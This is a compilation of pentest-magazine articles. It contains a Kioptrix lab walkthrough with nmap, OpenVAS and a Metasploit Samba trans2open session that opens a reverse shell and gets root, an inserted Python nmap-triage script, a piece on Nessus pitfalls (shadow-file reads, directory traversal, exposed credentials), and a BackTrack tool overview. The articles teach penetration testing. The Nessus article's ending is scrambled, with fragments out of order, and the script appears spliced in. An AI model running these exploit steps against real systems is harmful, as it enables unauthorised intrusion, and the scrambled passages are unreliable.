OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds

Listing 5. UDP ports/services enumeration
$ nmap -sU -P0 -O -n 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:37 CEST
Nmap scan report for 192.168.1.105
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT      STATE         SERVICE
111/udp   open          rpcbind
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
32768/udp open|filtered omad
MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1086.79 seconds

Penetration Test Simulation: Vulnerabilities Identification
The process of identifying the target's vulnerabilities can be simplified by using a vulnerability scanner. The vulnerability scanner which I use in this simulation is OpenVAS [10] and all the described actions are submitted to the engine through the web interface. Please refer to the manual to set up this vulnerability scanner properly. To start a scan you first have to define the target. This can be done through the menu "Configuration -> Targets" (Figure 2). After the target creation I proceed with the scan. In order to start a vulnerability scan, you first have to create a task through the menu "Scan Management -> New Task" (see Figure 3) and then start the created task (see Figure 4). In a real world scenario you must also verify that the selected scanning policy does not contain any check that could cause a denial of service. In this test case, the default settings are enough. The vulnerability scan will take some time to complete, which means that this is a great time for a coffee.
Analyzing the output of the vulnerability scan, it is possible to identify 69 security issues that require manual verification. At this point, for each identified vulnerability, it is necessary to check the listed references in order to spot any potentially exploitable service. Note that the results provided by OpenVAS are not complete: for example, the vulnerability scanner did not find any vulnerability affecting the Samba daemon. Beyond the specifics of this test case, the steps involved in identifying vulnerabilities are similar to the ones described in this example even if you use a different scanner.
Another way to identify vulnerabilities is based on the banners exposed by the services enumerated during the port scan and on the information that can be obtained by inspecting the network traffic. Basically, it is possible to find on the Internet publicly disclosed vulnerabilities for the services identified on the target. This method, when applied in a real scenario, could take a long time, particularly if you have to analyze a lot of targets. Anyway, it could be useful in some cases, especially when the vulnerability scanner fails to identify the vulnerabilities for you. To demonstrate this method I proceed with the analysis of the vulnerabilities related to the Samba daemon. First of all it is necessary to generate some traffic directed to the Samba daemon. During the network scan I was able to identify the Samba workgroup name, MYGROUP, so I will try to connect to the daemon using an anonymous session while recording the network traffic with tcpdump. Listing 6 shows the rpcclient command line options which I use to connect to the Samba daemon. As shown in Listing 6 the connection is successful. It is thus time to analyze the network traffic using Wireshark [11]. Using the display filter "frame contains Samba" it is possible to identify the version running on the target: Samba 2.2.1a. Figure 5 shows the captured packet that contains this juicy information. Using the cvedetails [12] website it is possible to look for any remotely exploitable vulnerability for Samba version 2.2.1a. In this case there is a vulnerability, CVE-2003-0201, that is remotely exploitable using a Metasploit module. Figure 6 shows the search results.
Figure 2. Target Creation
Figure 3. Task Creation
Figure 4. Vulnerability Scan Start

Listing 6. rpcclient connection to samba daemon
$ rpcclient -I 192.168.1.105 -w MYGROUP -U "%"
rpcclient $>

Figure 5. SMB Packet containing samba daemon version information
Figure 6. CVE-2003-0201 vulnerability details

Penetration Test Simulation: Vulnerability Exploitation
Exploiting the vulnerability is straightforward. Thanks to Metasploit [13], it is possible with just a few commands to obtain remote privileged access on the target system. Listing 7 shows the Metasploit session output. During a real penetration test you should verify whether all the vulnerabilities identified are exploitable or not. It is not sufficient to stop the penetration test at the first identified vulnerability. If the presented scenario were a real one, I should also have tested possible vulnerabilities affecting http, ssh and all the other identified services. Moreover, once you "breach" the security measures it is time to identify the relations between the vulnerable system and the other systems interacting with it.

Listing 7. metasploit session output
$ msfconsole
=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1045 exploits - 589 auxiliary - 174 post
+ -- --=[ 274 payloads - 28 encoders - 8 nops
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > show options
Module options (exploit/linux/samba/trans2open):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
Exploit target:
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
msf exploit(trans2open) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(trans2open) > exploit
[*] Started reverse handler on 192.168.1.107:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.105:32862) at 2013-04-24 05:56:25 +0200
id
uid=0(root) gid=0(root) groups=99(nobody)

Conclusion
What I tried to show you in this article is that, in order to become a professional penetration tester, you need to understand how to work to meet business and industry needs. This article quickly covers techniques and methodologies that are the subject of whole books; however, my goal with this is not to be exhaustive but to be a starting point to approach penetration testing as a profession.

References
[1] BackTrack 5 R3 – http://www.backtrack-linux.org/downloads/
[2] Kioptrix VM Level 1 – http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar
[3] OSSTMM Methodology – http://www.isecom.org/mirror/OSSTMM.3.pdf
[4] ISSAF Methodology – http://www.oissg.org/files/issaf0.2.1.pdf
[5] OWASP Methodology – http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
[6] PuTTY – http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
[7] OpenSSH – http://www.openssh.org/
[8] Bash reference manual – http://www.gnu.org/software/bash/manual/bashref.html
[9] nmap – http://nmap.org/
[10] OpenVAS – http://www.openvas.org/
[11] Wireshark – http://www.wireshark.org/
[12] CVEDetails, samba related search results – http://www.cvedetails.com/vulnerability-list/vendor_id-102/product_id-171/version_id-9501/Samba-Samba-2.2.1a.html
[13] Metasploit framework – http://www.metasploit.com/

FRANCESCO PERNA
Computer enthusiast since childhood, he has spent more than 15 years on the research of security issues related to applications and communication protocols, both from the offensive and the defensive point of view. He is a partner and technical director of Quantum Leap s.r.l., a company that offers security services to companies and organizations.
http://www.linkedin.com/in/francescoperna
[email protected], www.quantumleap.it
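The port tables in Listings 4 and 5 of the article above can be triaged mechanically before any manual lookup begins. The following Python example is added here and is not code from the article; it assumes nmap's normal output format exactly as printed in those listings and applies only the checks the article itself makes (an "open|filtered" UDP port is unconfirmed, an SSH banner with protocol 1.99 still accepts SSH-1, and every version banner is a candidate for a public-advisory search). The sample input reproduces the article's two listings:

```python
"""Parse nmap's normal output and triage what it says about exposed services.

Added example, not code from the article. It reads the text format of
Listings 4 and 5 (a "PORT STATE SERVICE [VERSION]" table) and applies only
the checks the article itself makes: a port counts as confirmed only when its
state is "open"; "open|filtered" UDP ports need manual confirmation; an SSH
banner showing protocol 1.x or 1.99 still accepts SSH-1; every version banner
is queued for a public-advisory lookup.
"""
import re
from dataclasses import dataclass, field
from typing import List

PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>open\|filtered|open|closed|filtered)"
    r"\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str = ""


@dataclass
class Triage:
    confirmed: List[Service] = field(default_factory=list)    # state == open
    unconfirmed: List[Service] = field(default_factory=list)  # state == open|filtered
    lookups: List[str] = field(default_factory=list)          # banners to research by hand
    notes: List[str] = field(default_factory=list)            # misconfigurations spotted


def parse_nmap(text: str) -> List[Service]:
    """Extract the port table rows; headers, summaries and OS lines are ignored."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            services.append(Service(int(m.group("port")), m.group("proto"), m.group("state"),
                                    m.group("service"), (m.group("version") or "").strip()))
    return services


def triage(services: List[Service]) -> Triage:
    t = Triage()
    for s in services:
        if s.state == "open|filtered":
            # nmap got no reply: the probe was not understood, or a filter dropped it.
            t.unconfirmed.append(s)
            continue
        if s.state != "open":
            continue
        t.confirmed.append(s)
        if s.version:
            t.lookups.append(f"{s.port}/{s.proto} {s.version}")
        # "protocol 1.99" means both SSH-1 and SSH-2 are negotiated; "1.x" is SSH-1 only.
        if s.name == "ssh" and re.search(r"protocol 1\.", s.version):
            t.notes.append(f"{s.port}/{s.proto}: SSH protocol version 1 is still enabled")
    return t


# Sample input: the port tables of Listings 4 and 5, as printed in the article.
TCP_SCAN = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open  status      1 (RPC #100024)
"""
UDP_SCAN = """\
PORT      STATE         SERVICE
111/udp   open          rpcbind
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
32768/udp open|filtered omad
"""

if __name__ == "__main__":
    for label, text in (("tcp", TCP_SCAN), ("udp", UDP_SCAN)):
        t = triage(parse_nmap(text))
        print(label, "confirmed:", [s.port for s in t.confirmed],
              "unconfirmed:", [s.port for s in t.unconfirmed])
        for n in t.notes + t.lookups:
            print("  ", n)
```

Keeping "open|filtered" ports in a separate list matters for the report: they are neither proven open nor proven closed, which is exactly why the article warns against scanning the whole UDP range and why each one needs a service-specific probe or a credentialed check before it is written up.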
PENTESTING WITH TOOLS
Penetration Testing with Nessus

The Continual Need for Trained Pentesters
In the last 10 years, cybersecurity has become a household word and, due to the growth of critical infrastructure and an exponential increase in the related threat of cyber-attack, it dominates every conversation we have about securing this critical infrastructure. This has resulted in increased customer demand for services; a growing market for cybersecurity vendor products; and an expansion within higher education curricula, including advanced degrees and certification programs within the cybersecurity field. The president of the United States has declared that the "cyber threat is one of the most serious economic and national security challenges we face as a nation", and that "America's economic prosperity in the 21st century will depend on cybersecurity". This emphasis has significantly expanded investment in cybersecurity, illustrated by the 2013 allocation of $769 million to the Department of Homeland Security for its cybersecurity initiatives and the request by the Department of Defense for $3.2 billion by 2015. These expenditures on cybersecurity are part of a projected $65.5 billion to be spent by the federal government between 2013 and 2018.
Playing a critical role in this clearly growing industry is the penetration tester, also known as a pentester. The pentester is an individual constantly staying abreast of the newest exploits, security flaws, and tricks-of-the-trade. This role has created a specialized niche within the cybersecurity realm and has become a vital part of any security program and security assessment.
According to the SANS Institute, penetration testing is ranked as the second "coolest" job in the industry. This enthusiasm has created a much larger mainstream market flooded with tools for the aspiring penetration tester. There are a significant number of both free and commercial penetration testing tools available on the market. The most popular of these tools, and the most widely used by penetration testers of every skill level, is the automated vulnerability scanner. There is a common misconception that penetration testing is simply running an automated vulnerability scanner and all the important vulnerabilities will be magically highlighted for the tester as a result. After that, it's a simple matter of determining the false positives and exploiting the ones that are valid. To better examine this theory, we will take a look at one of the most popular vulnerability scanners currently in use today, Nessus® (Tenable Network Security, Inc.).

Nessus Vulnerability Scanner
Nessus, a vulnerability scanner created by Tenable Network Security, exists primarily as either a free, non-commercial version for home use or a professional version (with paid licenses for each system it is used on). Version 5, the most recent version of Nessus, and version 4 are built on a server-client model, taking a built-in (and continually updated) series of more than 50,000 plug-ins (vulnerability and configuration checks) to determine any existing vulnerabilities or issues on a set of specified targets and ports. It makes use of an HTML5 web interface for the client piece that allows easy configuration of the scan and can be used with the same functionality on Linux® (Linus Torvalds), Windows® (Microsoft Corporation), OS X® (Apple Inc.), and mobile platforms. The server component runs the test and performs the actual vulnerability scan. It flags the high-risk findings with an ominous red color, moderate-risk issues with a cautionary orange, and the most common low-risk occurrences with a muted blue color (considered informational).
Each finding will not only have a rating and a fully detailed description of the issue, but the tester can also check to see if an associated exploit exists, along with a corresponding Common Vulnerabilities and Exposures (CVE) identifier and BugTraq number, if one exists, for the tester to read further about the potential exploit. Nessus will go even further and point out an exploit framework to use (Metasploit® (Rapid7 LLC), Core Impact® (Core SDI, Inc.), Immunity CANVAS™ (Immunity, Inc.), etc.) if there is one with a known workable exploit. Given this startling wealth of automated analysis and reporting provided to the aspiring cybersecurity professional, one could be led to think that the profession has become more of a point-and-click exercise to fill one more box on a security assessment checklist. At the end of the day, the tester will have run Nessus, used all the identified exploits that were highlighted; employed all the default and null passwords that were provided to access a wide variety of services and devices; and even examined the wealth of additional enumerated data that was outlined by the detailed report, complete with color priority codes, custom filters, and targets logically grouped by IP address. At the conclusion of testing, the tester wraps up, unplugging from the network, and leaves confident, knowing that a thorough penetration test was conducted. The customer feels reassured by knowing that, at a minimum, all the important high-level threats have been identified and no systems were harmed in the making of this pentest. But that may not be the case... What could possibly have been missed?
Let's take a walk back through the above case and see where things could possibly have been overlooked or gone askew.

Pre-game: Network mapping
Prior to running the Nessus tool, a penetration tester has to first determine the target list that will be fed into the tool. What IP addresses are we scanning? Let's assume we ran the basic host discovery scan. Did we account for firewalls? Many starting testers will run a network discovery scan once and faithfully record the IP addresses that were discovered. Did we accurately identify the operating system (OS) in the hope of reducing the number of plug-ins run during the vulnerability scanning phase?
Ideally, testers will use a network mapping tool (Fyodor's Nmap and variants are a popular choice) to better define the target space. Were all 65,535 ports examined? By default, Nmap does not scan every port. On one particular engagement, a high-level port (not found in the basic Nmap scan) contained a running BeanShell. BeanShell is an environment with dynamically interpreted Java® (Oracle America, Inc.) and scripting capability with powerful features, including a remotely accessible shell for debugging (or printing password hashes from the server it is running on; Figure 1).
Figure 1. Redacted image of displaying the contents of a shadow file with cat via BeanShell's exec command

Main Event: Running Nessus
Rookie mistake? Maybe it would be easier to just skip any preliminary steps and use Nessus's built-in Transmission Control Protocol (TCP) scanner instead? Problem averted! Let's take a moment and see what else could go wrong.
Is your host-based firewall up? That could greatly interfere with the validity of your scan, even resulting in the loss of some of the probes intended for your target. Are you using a virtual machine (VM) and running more than one operating system at once? Are you using a Network Address Translation (NAT) configuration because the customer only had one usable IP address for you? Nessus as far back as Version 2 had known issues when run on a VM in NAT mode, even creating false negatives in some cases, causing vulnerabilities to be overlooked. Nessus clearly documents potential issues and has addressed many in later versions, but many beginning security analysts may consider Nessus to be relatively simple and overlook the importance of reading through the guide.
At this point, the tester may think, "We can have the best of both worlds" and run Nmap functionality straight from Nessus. Nessus is configured to run each plug-in against one host. A special plug-in is used to call Nmap functionality. If 20 hosts are scanned at once, 20 instances of Nmap will be run, one against each host. This can quickly become a resource nightmare. One last consideration that can concern customers is whether safe checks are employed. Denial of service is one of those situations that no penetration tester ever wants to experience on a customer site, nor the associated repercussions for it occurring due to negligence, which can be severe.

After Party: Reading Through Nessus Results
Assuming the previous steps were followed, the tester has hopefully managed to avoid all of the pitfalls of setting up and running the Nessus scanner. However, there's more to take into consideration. In a typical scenario, you have dutifully identified all the high-risk findings and some of the more interesting medium-risk findings, but you are on a tight schedule and focused on additional important priorities. However, there remain hundreds of low-risk findings and "less interesting" medium-risk findings that may have been ignored in the interest of time. There are names of potentially open file shares that are listed faithfully by Nessus, but generally do not come with a screaming red SECURITY HOLE attached to herald their existence. This is when it becomes vitally important to make the effort to avoid the common tendency of thinking that just because a finding has low risk or "no risk" associated with it, it is worthless. Developers tend to be pressed on schedule, which results in the casual saving of files wherever it is quick and convenient to access them. Development teams may create temporary shares to more easily run tests and access other teammates' scripts. What's that? The labor-saving script that's sitting on the share has admin credentials? This not only saves the developer time and energy, but also the busy pentester (Figure 2). A host can potentially have a startlingly large number of shares open to the public (including the dreaded C$ and Admin$) and still be listed with a risk factor of "none" (Figure 3). Nessus also identifies many directory traversal issues as a low- or medium-risk finding (though it marks a number of others as high, depending on the plug-in). With directory traversal, one can pull configuration files, logs, /etc/passwd files (useful for determining user names) and a wealth of data from a target. Maybe those lower, less flashy findings aren't so unimportant after all.
Figure 2. Redacted configuration file with perl script settings, and database credentials accessible via unauthenticated web access
Figure 3. A list of open server message block (SMB) shares identified by Nessus
Even the more attractive findings produced by Nessus can result in overlooked issues. You look up the finding suggested by Nessus, and you realize you are running the suggested exploit framework with all the most current plugins. You triumphantly load up the exploit, set your payload, and fire away. However, there is a mental checklist of questions you should have asked yourself beforehand, even when dealing with low-risk exploits.
• Did you check which port it was running on?
• Is it possible a firewall is blocking the return port selected (e.g., default 4444 on Metasploit), and you record the system as being "patched"?
• In haste, did you check the info data to see if a DoS was possible with the exploit we are running, due to the version of the OS running on the target system?
What many do not stop to realize is that developers and companies are running the same automated tools that pentesters use. Patching and protecting against remote exploits have increased. Vendors incorporate the newest safeguards into their software. Unless the customer is tragically bereft of any security know-how, odds are they not only run the same automated tools and scanners you do, but they also have even more expensive shiny tools that create better-looking reports. The true value of pentesters, which makes the profession continually stand apart in the cybersecurity industry, is their knowing how to properly use the tools that are available to them and an ability to manually analyze the security environment to see, in many cases, the gaps in security. A pentester is able to look at custom, homegrown application code that does not have a published advisory and still thoroughly see the security issues in their entirety. Pentesters observe the application filters, security permissions, and firewall rules that often baffle automated tools and find ways around them. Much like a martial artist who learns how to punch, kick, and block will still take years of practicing and training before gaining a true level of proficiency, a pentester can learn a stepwise methodology, the syntax of a myriad of tools, and have bookmarks to every major security advisory site. It may still take years to turn the learning of a craft into an art form.

How to Become a More Proficient Penetration Tester
Despite the numerous considerations to take into account while testing, Nessus and other security tools still remain highly useful. They are meant to enhance or better facilitate a penetration test, but are not used in place of one. There are some basic principles that should be constantly in the mind of every penetration tester.
Learn the Tools
Nessus alone has a wealth of other features (mobile device examination, Payment Card Industry (PCI) compliance, credentialed policy scans, and even the ability to create custom Nessus® Attack Scripting Language (Tenable Network Security, Inc.) plug-ins) that cannot possibly be covered in a short article. It has a user-friendly interface and intuitive policy creation options. This does not remove the need to learn what flaws or issues the tool may have (every tool has them) or the situations where another tool may be more useful. If one tool did it all, there would not be such a huge market of penetration testing tools. Experimenting at home or within a test lab to learn the quirks of any tool is highly advisable. Make notes of what works well and of strange behavior so that others on your team do not have to learn the hard way.
Understand the Networking
Many of the issues described dealt more with the configuration of your testing computer, the configuration of VMware® (VMware, Inc.), and the configuration of the customer's network perimeter. To use a network testing tool, knowledge of the network becomes vital. If Nessus or any other tool seems to be behaving oddly, start a network sniffer (e.g., Wireshark® (Wireshark Foundation, Inc.)) and see what the activity looks like. Are the connections being made appropriately? Where in the process did things break down? If the tester does not realize what is going on "under the hood", he or she may never realize what exactly is causing issues in the test.

Conclusion
The questions and concerns that have been addressed throughout this article are not profound secrets of the Art of Penetration Testing. However, leaving such issues unaddressed results in many of the common mistakes for which novice and even some more experienced pentesters are known. Common mistakes happen for a large variety of reasons. Testers who do not have the experience and training that is necessary may tend to develop an overreliance on automated tools and accept on blind faith the settings configured out of the box and the data that results from them. Starting testers become so obsessed by the "high-risk" findings (much like a shiny, red, blinking button) that they tend to turn their noses up at the often-overlooked, lower-risk findings.
sion of software means a new puzzle to unlock. Learn from experience, share techniques, observe forums, set up your own network and try out new things. Nessus has shown itself to be a versatile, powerful, and highly useful tool for the penetration tester.

References
• "Cybersecurity | The White House." Web. 25 Mar. 2013. http://www.whitehouse.gov/cybersecurity
• Brownstein, Ronald. "Pentagon Seeks $3.2 Billion for Revised Cyber Budget – NationalJournal.com." NationalJournal.com. Web. 25 Mar. 2013. http://www.nationaljournal.com/tech/pentagon-seeks3-2-billion-for-revised-cyber-budget-20110325
However, like any of the other hundreds of existing
Keep the Goal in Mind It is important to keep the goal of your test in mind (control the network, going after sensitive celebrity accounts, or preventing the system from declar-
ing thermonuclear war). It differs from customer to
security tools, it does not in any way replace the penetration tester. Instead, it helps make the process of testing smoother, faster, and often easier so that the penetration tester is better able to do the job.
customer. Do they want a simple compliance scan so they can point and say they remediated all the
"high-risk" findings? If the customer really wants to know that their information is safe, it will help for the tester to take the time to learn what they most want to protect. Hunting after high-risk find ings can be pointless if they were all on a development box that is on its own, segregated subnet,
unreachable by the rest of the network that will be turned off next week. An open share that happens to reside on a development version of the main database server ultimately allows one to not only compromise the database, but also the underlying OS. This could easily lead to captured password hashes and the compromise of several other serv-
ers on the network.
Learn the Customer Each new test is a new experience; see how a par-
ticular network is deployed. Learn the standard procedures for each particular client. Many organizations have their own naming and coding conventions for their applications. Developers share source code. Password naming conventions by
the help desk seem to follow the same patterns. Customize the test to fit the current target site.
Be Creative Penetration testing largely involves thinking "outside the box." A tester is learning a series of rules and configurations and then obligingly getting around them. Each new security measure and v er-
StartKit 01/2013(01)
DAN ROBEL, CISSP, GCIH, GPEN Dan Robel is a senior cyber penetration testing specialist at SAIC. With over 10 years of information security experience, he serves as a penetration test team lead and a course instructor for SAIC within the Washington, D.C. area. He has guest lectured on cyber warfare at the Air Force Institute of Technology. Robel offers his penetration test expertise as a “red team” member for SAIC’s CyberNEXS, a patented cybersecurity training and exercise platform, during the Air Force Association’s CyberPatriot national high school cyber defense competition and the Maryland Cyber Challenge. Robel earned a Bachelor of Science in business and computer science from Mount Saint Mary’s and a Master of Science in knowledge and information management with a concentration in information security from George Washington University. His master’s thesis "International CyberCrime Treaty" was adapted as an honors white paper for the SANS Institute.
Page 24
http://pentestmag.com
PENTESTING WITH TOOLS
BackTrack for Pentesting?

There is always a major struggle between the open source camp and the proprietary developed tool camp when it comes to the value of software and the impact and usability it has. And when it comes to security and testing software, these arguments are repeated over and over again.

The fact however remains that the guys and girls that seek to penetrate your network are not picky. That can put them at an advantage when it comes to the vectors of attack they identify. If you or your company looks at a specific philosophy when it comes to security, it is almost certain that the hacking world in general will also look at other exploits and methods of exploiting. For this, Einstein is to be taken literally on his word when he said, “If you invent something that is foolproof, the world will invent a better fool”. When it comes to open source tools, the internet is riddled with solutions for each and every thing you might want. And because of the nature of social and community developed software, the minds it sometimes attracts are the brightest the world has to offer. Thus, the quality of tool you can find is nothing short of “bleeding edge” and is usually the first when it comes to new ideas and philosophies.

But as with the bulk of open source tools you can find, the developer focus is the core of the problem, and the fringe-lying modules receive little, if any, attention. This makes open source tools notoriously difficult to configure and get to perform “as advertised”. Everything is possible for those selected few with the inherent knowledge and skill to tinker. And even if there is a large community behind these tools, it is difficult for these tools to be deployed for business use outside of the realm of tinkering. The type of person entering into the world of pentesting is usually such a person. He/she/they know their way around computers, and compiling source from scratch to get a tool to work is not such a mountain to climb for the regular user. But even if this class of individual is more than likely appointed on contract, it is sometimes not worth spending the time and effort to get something worthwhile configured. Especially if you need to earn your way in life, and each hour spent on something that should be trivial (like installing a small piece of software) becomes a chore.

Enter the good folks at the project that produces tools like BackTrack. The guys and girls of the BackTrack community spend their time on getting all the most important tools and getting them running as a “ready to use”/“out of the box” solution. No longer does it take forever to hunt down the correct tool and get it to run in whatever environment you have already running. The task has become as easy as downloading the image, and running it from either a virtual space, live from a USB stick or booting from the DVD. All the key tools are there. All you need to do is find the tool that suits your needs, and learn how to use it. And in most cases, there is more than one almost similar tool configured inside BackTrack, for your convenience.
Even though the purists among us will still prefer to configure and maintain their own implementation of the selected tools, BackTrack makes it easy to get started, and should not in any way be seen as sub par to bit-for-bit compiled and file-for-file configured tools. Far from it! The mindset of the hacker is not how pure your configuration is, or who did the best job of configuring the tool that will allow for the exploit of a system. As long as the goal is achieved, the tool was worth using. And the core focus of a professional pentester is to put him/herself in the same mind as a hacker, and find the vulnerabilities in servers and systems before anyone else does. With the tool in hand, and the base understanding of what is required to be found, you can now set forth and start your testing on systems and applications.

Ethics plays a large role in distinguishing between hacker and pentester. The difference is not in skill, but in the way access to systems is disclosed. A hacker will do this as a sport; a cracker will do it for self gain (the two descriptions are different, but usually used interchangeably by the media and Hollywood), whereas a pentester will do all this above board, getting the permission of the company or person the test is done against before starting the process of information gathering and exploitation. And then also, at the end of it all, the pentester will disclose all exploits found, putting the focus squarely on assistance in the rectification of security issues, rather than maintaining access to these systems for future and personal use. It can be seen as a moral gray area, but trust and an internal ethical drive have to govern the pentester to do what is right. In short, pentesters are seen as white hat hackers with a piece of paper allowing them to hack.

If you don't know this already, hacking is quantified in 5 stages when it comes to the education of pentesters. These stages are: (1) information gathering, (2) system scanning, (3) gaining access to a system, (4) maintaining access to the exploited system, and (5) covering your tracks, ensuring your actions go unnoticed. For each of these stages, BackTrack has a set of tools assisting you in getting the correct information to reach your goal.

Information gathering: Because cracking passwords and finding back doors into systems is a time consuming and sometimes impossible task, life for a hacker becomes much easier if he/she knows how a system works, and even more so if user-names and passwords are known. Gathering information like this (and sometimes striking gold in the sense of user-names and passwords) is what social engineering is all about. Rather work smart than too hard.

BackTrack is a fully functional operating system with web browsers included. No need to search Google from your primary OS and then having to write your notes before starting BackTrack; you can do all the work from this environment. For gathering technical information, BackTrack's Firefox browser has a number of tools installed to allow you to find information on the pages you browse. Scripts will be shown and you will be notified if something odd is used on the website you are looking at, before you even start scanning. As a further step BackTrack allows you to browse the site through a security proxy, which will passively investigate your target while you browse. This is ideal for investigating without alarms going off at the client's side while you are looking at the site or system in more detail than is initially disclosed. For this, look into BURP SUITE and OWASP ZAP. Both run locally on BackTrack, allowing you to point your browser to them and browse the sites you need to investigate. On the application interface, you will find more information than you would ever believe is possible.

Scanning the system: The first technical step in hacking is to scan the target machine(s) to understand where the “attack” can be launched. Having a list of open ports will give you an idea of the services that are running. Corporates will very seldom run services on weird ports because of standardization and, in most cases, compatibility between different servers and systems. The tool of choice here is NMAP. It is also seen as the industry standard, and a large number of tools, open source and proprietary, use it as a base to find the initial information on a system before making the further decision of which vector or attack to try and exploit. NMAP is an active scanning tool, and if not used wisely will alert knowledgeable network and system administrators of your actions. NMAP comes in many flavours and even a number of graphical user interfaces. The most common of these is ZENMAP as installed on BackTrack. The features are the same, but are easy to access without learning command line parameters for each of the features.
Deciding which vectors of attack will be used, NMAP (or its derivatives) will show you the open ports on the system. Each of these ports is a potential vector of attack. And for each of the tools/services running on these ports, BackTrack has a tool to exploit or investigate further. The primary focus however for the pentester will be the website or web system running on the server. And depending on the mandate, the focus for information scanning will be on ports 80, 443 and 8080; the default open ports for web servers to run on. Tools such as theHarvester are used to check social media sites like LinkedIn and search engines for any email accounts linked to the domain you are trying to access. Results can be refined by putting result limits on the scan. A similar tool on BackTrack is websecurify; its results will inform you of server versions that are being displayed. Removing the version numbers from being displayed will assist you in hardening the server against scans for versions by possible attackers (Figure 1 and Figure 2). Another popular tool is the Joomscan tool that checks a web server for the version of Joomla installed and the various vulnerabilities associated with the plug-ins and modules installed on the website. The results are categorised into low, medium and high risk problems. Joomscan allows you to quickly identify the key problems in the site (Figure 3).

Figure 1. Websecurify Web-testing tool
Figure 2. Websecurify scan log output
Figure 3. Joomscan with Scan options

A vast majority of the attacks on domains however occur via SQL injection on the website. BackTrack comes installed with Sqlmap. Scans done with sqlmap can be refined to scan for an operating system version with the --os=linux modifier, as well as set to scan for a specific type of database such as MySQL, MS SQL etc. with the --dbms=MYSQL modifier on your scan; the level of the scan can be set to run a more intense scan on the account if the initial scan does not reveal any errors (Figure 4 and Figure 5).

Figure 4. Sqlmap tool scan options
Figure 5. Sqlmap example scan query

For every piece of software introduced to a system, bad code can open up the system for exploit. Web applications and websites are no exception. They are the primary focus for hackers because they are the most visible, and usually the part introduced on a server (be it Windows, Linux or any other UNIX environment) that is not tested for all eventualities before it goes live.

Web testing is made easy with BackTrack. An industry standard tool included is W3AF (Web Application Attack and Audit Framework). This is not only a command line tool, but has a graphical interface as well, making the use of the system easy. The results are given in report format as well as in a usable interface form allowing the knowledgeable to do exploits directly from the GUI (Figure 6 and Figure 7). Additional tools already included in BackTrack are WPSCAN and JOOMSCAN, which are built specifically for the world's 2 most used content management systems: WordPress and Joomla!. Identifying these systems and then running a scan is very easy using these tools. And because of the expandability of both these systems, old versions can be seen as very insecure, resulting in easily exploitable vulnerabilities.

Figure 6. W3af graphical user interface startup screen
Figure 7. W3af OWASP_TOP10 Scan against domain.com

Exploiting the system to gain access: The sport in hacking is to gain access to a system that you target. All the information you have gathered will assist you in achieving this ultimate goal. Sometimes it is as easy as using a found user-name and password, and from there exploring and seeing if you can escalate yourself to the highest level of rights on a system. Sometimes none of the information you gathered is valid, and then it becomes a technical game to see the hack through. Access to a system can result in a number of things that can be done. Defacing a website to make a political statement (in the realm of cracking) or leaving a hidden note for other hackers to find (the sport of hacking) may seem like the ultimate, but it is only the most visible of Internet penetration and hacking. Hidden away from the public eye (databases or data encapsulated in confidential files) is where the elite hacker plays.

For this, the best-known automated tool is METASPLOIT. This tool is installed and ready to be used in BackTrack. BackTrack also includes a graphical interface to METASPLOIT called ARMITAGE. Yet again, the command line options are represented via a mouse click interface, and make the multi scan of multiple hosts easier than the time consuming typing of each host into the interface. This, however, is still available for those pesky exploits that need fine tuning. METASPLOIT is a compilation of tools and scripts (especially scripts) for known exploits for different sets of tools running on servers. This spans all commonly used operating systems used as servers, and even exploits for desktop class operating systems. The advantage of using METASPLOIT is that exploitation does not stay theory. If it can exploit a vulnerability, it will, and you get presented with the terminal to further your hack.

METASPLOIT is not the only exploitation tool included in BackTrack. For a number of specific tools, there are specific exploits targeting those systems only. CISCO is a major target, with the CISCO-GLOBAL-EXPLOITER already installed and configured on BackTrack. As are MySQL, MS SQL and ORACLE tools. But for a pentester, the most important will be the SQLMAP tool, allowing easy exploit of SQL injection points found by W3AF, WPSCAN and JOOMSCAN.

